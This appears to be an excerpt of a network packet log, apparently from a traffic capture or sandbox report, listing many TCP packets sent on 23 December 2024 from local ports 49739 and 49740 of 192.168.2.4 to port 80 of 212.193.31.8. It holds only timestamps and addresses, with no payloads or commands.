                                                                      Dec 23, 2024 06:38:39.739633083 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739661932 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739685059 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739718914 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739746094 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739775896 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739801884 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739830017 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739857912 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739983082 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740009069 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740036011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740061998 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740137100 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740164042 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740191936 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740217924 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740247011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740319014 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740345955 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740371943 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740400076 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740428925 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740497112 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740525007 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740550041 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740576029 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740607977 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740776062 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740803957 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740832090 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740858078 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740884066 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740915060 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740940094 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740968943 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.740994930 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741019964 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741054058 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741075993 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741099119 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741126060 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741157055 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741183043 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741313934 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741338968 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741364002 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741471052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741502047 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741527081 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741596937 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741626978 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741650105 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741677999 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741774082 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741799116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741827011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.741853952 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742037058 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742068052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742100000 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742126942 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742153883 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742185116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742209911 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742238045 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742265940 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742291927 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742320061 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742347002 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742371082 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742400885 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742535114 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742564917 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742594004 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742623091 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742651939 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742729902 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742760897 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742788076 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742815018 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742847919 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742940903 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.742969036 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743041039 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743067026 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743093967 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743129015 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743161917 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743185043 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743572950 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743604898 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743633032 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743659973 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743690014 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743716955 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743743896 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743772030 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743798018 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743824959 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743853092 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743879080 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743912935 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743936062 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.743963003 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744091988 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744119883 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744147062 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744175911 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744208097 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744329929 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744362116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744434118 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744462013 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744489908 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744594097 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744625092 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744652033 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744677067 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744709969 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744914055 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744914055 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744937897 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.744988918 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745017052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745043993 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745069981 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745095015 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745121002 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745152950 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745177984 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745203972 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745229959 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745255947 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745280981 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745310068 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745348930 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745374918 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745404959 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745433092 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745460033 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745559931 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745616913 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745616913 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745646000 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745670080 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745699883 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745809078 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745836020 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745865107 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.745985985 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746014118 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746042967 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746071100 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746117115 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746155977 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746184111 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746232986 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746272087 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746301889 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746328115 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746354103 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746381044 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746414900 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746443987 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746469975 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746494055 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746532917 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746561050 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746584892 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746609926 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746635914 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746660948 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746685982 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746712923 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746747971 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746774912 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746803045 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746828079 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746854067 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746880054 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.746905088 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747021914 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747021914 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747040987 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747070074 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747119904 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747158051 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747188091 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747229099 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747262001 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747287989 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747318029 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747342110 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747368097 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747399092 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747493982 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747493982 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747520924 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747562885 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747594118 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747622013 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747646093 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747690916 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747718096 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747750044 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747780085 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747889042 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747915983 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747942924 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.747970104 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748004913 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748028040 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748055935 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748084068 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748106003 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748743057 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748800993 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748861074 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748929977 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.748974085 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749044895 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749070883 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749098063 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749128103 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749159098 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749187946 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749221087 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749244928 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749274969 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749300003 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749330044 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749361038 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749382973 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749407053 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749432087 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749456882 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749475956 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749502897 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749528885 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749558926 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749583960 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749613047 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749625921 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749651909 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749680996 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749702930 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749726057 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749752998 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749787092 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749849081 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749927044 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749957085 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.749995947 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750025034 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750056028 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750082016 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750108004 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750134945 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750161886 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750190020 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750216961 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750237942 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750266075 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750294924 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750356913 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750381947 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750411034 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750437975 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750473976 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750492096 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750518084 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750545025 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750572920 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750603914 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750632048 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750658989 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750715017 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750742912 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750776052 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750804901 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750845909 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750869989 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750895023 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750932932 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750962973 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.750988960 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751015902 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751044035 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751080036 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751104116 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751132011 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751171112 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751204967 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751307964 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751331091 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751360893 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751389980 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751415968 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751442909 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751468897 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751497984 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751528025 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751555920 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751584053 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751611948 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751637936 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751663923 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751688004 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751715899 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751739025 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751769066 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751786947 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751811981 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751841068 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751873016 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751892090 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751924992 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.751980066 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752160072 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752298117 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752327919 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752360106 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752372980 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752396107 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752423048 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752444029 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752473116 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752496958 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752541065 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752567053 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752650023 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.752671957 CET4974080192.168.2.4212.193.31.8
